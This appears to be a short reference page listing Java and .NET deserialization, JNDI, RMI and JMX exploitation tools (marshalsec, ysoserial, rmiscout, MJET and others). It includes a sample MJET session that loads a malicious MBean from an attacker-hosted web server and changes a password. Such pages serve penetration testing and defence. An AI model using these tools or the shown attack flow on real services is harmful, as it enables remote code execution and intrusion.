marshalsec: Java Unmarshaller Security - Turning your data into code execution.

java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]

ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

ysoserial.net: Deserialization payload generator for a variety of .NET formatters.

rmiscout: RMIScout enables wordlist and bruteforce attacks against exposed Java RMI interfaces to safely guess method signatures without invocation. It supports multiple Java RMI protocols, method invocation, and exploitation.

JNDI-Injection-Exploit: JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server,LDAP server and HTTP server. RMI server and LDAP server are based on marshals and modified further to link with HTTP server.

beanshooter: Beanshooter is a command line tool written in Java, which helps to identify common vulnerabilities on JMX endpoints.

mjet: MJET allows easy exploitation of insecure configured JMX services. Additional background information can be found here and here.

h0ng10@rocksteady ~/w/mjet> java -jar jython-standalone-2.7.0.jar mjet.py 2222 install super_secret 8000

MJET - MOGWAI LABS JMX Exploitation Toolkit
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://
[+] Connected: rmi://  1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL - - [26/Apr/2019 21:50:37] "GET / HTTP/1.1" 200 -
[+] Successfully loaded MBeanMogwaiLabs:name=payload,id=1
[+] Changing default password...
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Successfully changed password
[+] Done
h0ng10@rocksteady ~/w/mjet> 

Last updated